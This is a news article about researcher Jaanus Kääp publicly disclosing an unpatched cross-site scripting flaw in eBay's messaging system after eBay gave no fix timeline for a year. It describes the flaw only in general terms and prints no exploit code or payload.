A potentially dangerous cross-site scripting (XSS) vulnerability has existed in eBay for more than a year, and it doesn’t appear the company is a rush to fix the issue.
Jaanus Kääp, a researcher based in Estonia, discovered the issue more than a year ago when he was looking into the security of web apps. Kääp, who also does pen-testing and training for the firm Clarified Security, disclosed the issue on Full Disclosure yesterday.
Kääp emailed eBay four times over the course of 12 months – initially a year ago, then again three, five, and seven months after he discovered the bug. After repeated prodding, officials at eBay told Kääp they couldn’t reveal any information about its fix schedule. Each time he emailed, Kääp claims, it was because the vulnerability had not been remedied. While eBay asked him not to disclose his bug, it has neglected to give him a timeline regarding a fix.
At the time Kääp didn’t think much of the emails and assumed that since it appeared to be an easy fix, the company would promptly fix the issue. Kääp was flabbergasted however on Tuesday when he logged into the site – a year after he first found the issue – to discovered it still exists.
“It was still there,” Kääp wrote in a blog entry Tuesday, “So it must not be as dangerous as I thought and no harm can happen from making it public.”
According to a description on Kääp’s blog, the bug could allow an attacker to carry out an XSS attack over eBay’s internal messaging system by catching and tweaking a request. Kääp points out the vulnerability could be a “high issue” for targeted attacking since session cookies in eBay are not HTTPonly, something that could help mitigate cookie theft and XSS attacks.
Kääp found the issue by attaching a photo to a message, uploading it, and modifying a GET/header request he captured in Burp Suite to contain a payload.
For his proof of concept Kääp simply attached a run of the mill XSS alert, but writes that he doesn’t believe there are any limiting factors for a XSS payload. Kääp also warns the issue could be combined with other vulnerabilities and that it’d be easy to create new users, without email verification, to execute the attacks.
It remains unclear whether eBay is still planning a fix for Kääp’s issue. The company did not immediately respond to Threatpost’s request for comment on Wednesday.